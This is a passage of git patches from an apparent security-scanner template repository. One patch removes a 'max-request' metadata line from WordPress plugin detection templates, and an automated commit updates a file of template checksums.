     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 3113a6831e56aca70a2bb65fca0d7f0502939d97 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 05:31:21 +0000
Subject: [PATCH 0590/1090] Auto Generated Templates Checksum [Fri Sep 29
 05:31:21 UTC 2023] :robot:

---
 templates-checksum.txt | 416 ++++++++++++++++++++---------------------
 1 file changed, 208 insertions(+), 208 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 78065ca63e..5c5a4fcbf7 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -367,7 +367,7 @@ helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7d
 helpers/wordpress/plugins/advanced-custom-fields.txt:cffca9b2145cbe8b44269c74219f807eace99c3e
 helpers/wordpress/plugins/akismet.txt:e710dd44fa12f98194f8bba2bb20cba7bee18ff6
 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f
-helpers/wordpress/plugins/all-in-one-seo-pack.txt:344b5cffb3c634589e6cd6bc3a7f10de5354fa39
+helpers/wordpress/plugins/all-in-one-seo-pack.txt:0f2d74125dea18acce67c02619dcfea86c380227
 helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc435f3680b17d2a
 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f
 helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57
@@ -393,7 +393,7 @@ helpers/wordpress/plugins/code-snippets.txt:c02807771e1a750f51754b3494db53c68a5a
 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/complianz-gdpr.txt:aa11d0c1b683ff91b10b12c27c193d1c0e3e79bd
 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
-helpers/wordpress/plugins/contact-form-7.txt:77526ddfb1469f41739fcab554059141c36d9329
+helpers/wordpress/plugins/contact-form-7.txt:17358dc21f97cd982510de77bcdadcaf77ef5371
 helpers/wordpress/plugins/contact-form-cfdb7.txt:c6802dfc6ada46af8820db93c237d00787bd441c
 helpers/wordpress/plugins/cookie-law-info.txt:67de27fd6cf8d4bc1ad0b22499ec7f87a1acf6c4
 helpers/wordpress/plugins/cookie-notice.txt:6b67ce6c1930ff8e1d5003aeb8218f8fbdd4e6d2
@@ -478,7 +478,7 @@ helpers/wordpress/plugins/ninja-forms.txt:802d91a07f27206424765f38e0bb5c75968ae3
 helpers/wordpress/plugins/ocean-extra.txt:595d550379b2cb8bccb9659627308ff4e751d23f
 helpers/wordpress/plugins/official-facebook-pixel.txt:ae0028333ce6fece2c0f57bd104815e938d80643
 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8
-helpers/wordpress/plugins/optinmonster.txt:efeb47fd41d5443772275287ca2523cab8bc0139
+helpers/wordpress/plugins/optinmonster.txt:a2386393a973e72dbd27804a8dc3f6ef5962f536
 helpers/wordpress/plugins/otter-blocks.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/password-protected.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606
 helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58
@@ -503,7 +503,7 @@ helpers/wordpress/plugins/seo-by-rank-math.txt:ee6a6cf943f9c499c0224b71af2aaa48c
 helpers/wordpress/plugins/sg-cachepress.txt:04e136873d85cb62901bb699285d9280e05828df
 helpers/wordpress/plugins/sg-security.txt:a2048abb201b6201e7cd25e8b0262758a98d59da
 helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3
-helpers/wordpress/plugins/shortpixel-image-optimiser.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e
+helpers/wordpress/plugins/shortpixel-image-optimiser.txt:c4220954772525d32e725d96f6075161e9a9a85f
 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b
 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd
 helpers/wordpress/plugins/siteguard.txt:b26853e0fc7b2e0fccdc39c5fe508249d0d5d410
@@ -517,7 +517,7 @@ helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b1
 helpers/wordpress/plugins/table-of-contents-plus.txt:9366fd51e17e65e8d9a6aae9f08e1553e1b8170e
 helpers/wordpress/plugins/tablepress.txt:5f6af51e77b84cd6616d4eaa100a736096568d86
 helpers/wordpress/plugins/taxonomy-terms-order.txt:d2a825593d236a4bdf4eeecfe093c2f0318fc0f9
-helpers/wordpress/plugins/the-events-calendar.txt:da12d3bdce91425575a83cf92ced2c2e796b4046
+helpers/wordpress/plugins/the-events-calendar.txt:e526fec978cec1cdf03f971d2297fbb921c3dade
 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940
 helpers/wordpress/plugins/translatepress-multilingual.txt:8e805063c85859847271163a1c51e5865e460aea
@@ -567,7 +567,7 @@ helpers/wordpress/plugins/wp-super-cache.txt:e9e533b0da8e5546eff821a40fbf7ca20ab
 helpers/wordpress/plugins/wp-user-avatar.txt:40f7f795c98a6e3f421465c06243187d42d8e3c5
 helpers/wordpress/plugins/wpcf7-recaptcha.txt:255ee3124118ef39f0c2d984854cb0f180c4b1fe
 helpers/wordpress/plugins/wpcf7-redirect.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0
-helpers/wordpress/plugins/wpforms-lite.txt:2269ecf858a6c42d0d3451e7a6857f7331e60f35
+helpers/wordpress/plugins/wpforms-lite.txt:640b75d1936f52903edd2795db2c553f3ad94165
 helpers/wordpress/plugins/wps-hide-login.txt:79eec5c95867be248c5b70dc82c95d33a9b7ef10
 helpers/wordpress/plugins/wpvivid-backuprestore.txt:61e0e2ed7647753ca89ac40eac19b4f93c5aad71
 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875
@@ -5680,7 +5680,7 @@ http/technologies/jira-detect.yaml:63e7961c4c5380514ef93e4e64f1f6eacc22fac0
 http/technologies/jira-serverinfo.yaml:ffd9c99f55855bc1277acf84da660a41fcc21dca
 http/technologies/jitsi-meet-detect.yaml:1249770b5b3c81d99881b23844d06ddc10704157
 http/technologies/jolokia-detect.yaml:2011275e69c3555dc1d053fe61c0770449d847af
-http/technologies/joomla-detect.yaml:2bb31b3fd47ce47aad2d75c1c5e5a090a40930cc
+http/technologies/joomla-detect.yaml:8f6bd40c3f959176e3cdbabcbbf6c9c8de46915c
 http/technologies/jsf-detect.yaml:b25612aaef2a7c315e91020f5266a74515c19eb3
 http/technologies/json-server.yaml:e867e671411ebe4c0c954b65dc88778ae7fcde62
 http/technologies/jspxcms-detect.yaml:1711e7a2e66a3e8138bd458a226f39ff9ea9cfcf
@@ -5865,218 +5865,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
